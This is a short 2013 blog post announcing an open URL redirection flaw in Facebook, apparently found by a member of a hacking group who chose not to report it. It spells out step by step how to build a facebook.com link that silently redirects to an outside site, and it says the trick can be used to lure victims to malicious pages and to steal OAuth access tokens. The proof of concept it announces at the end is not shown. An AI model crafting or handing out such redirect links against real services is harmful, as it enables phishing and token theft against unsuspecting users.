lundi 18 novembre 2013

Facebook open URL redirection vulnerability


Algerian Security Researcher "Asesino04" The Black Devils discovered an open URL redirection vulnerability in facebook that allowed attacker to have a facebook.com link edirect to any website without "Leave facebook" comment from facebook

This kind of  vulnerability is used to trick the victime by clicking on a trusted link whcih is designed to lead the victime to a malcious website .

Also this  vulnerability speacially if it was used to make a redirection on third part application can allowed attcker to steal the access token [Oauth Bug] which is very critical and dangerous .


The Founde of the exploit who is a member also in 1337DAY Team didn't report the bug to facebook


The vulnerability exists on the page where any person can download IOS or Android Sdk
You go to :
and you copy the link of "download sdk"
# you keep only this 
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=

# then you add to it 
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

#so it became like that : 

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
then it got redirect
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

:)
The Bug have  full discolure
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection

A proof of Concept :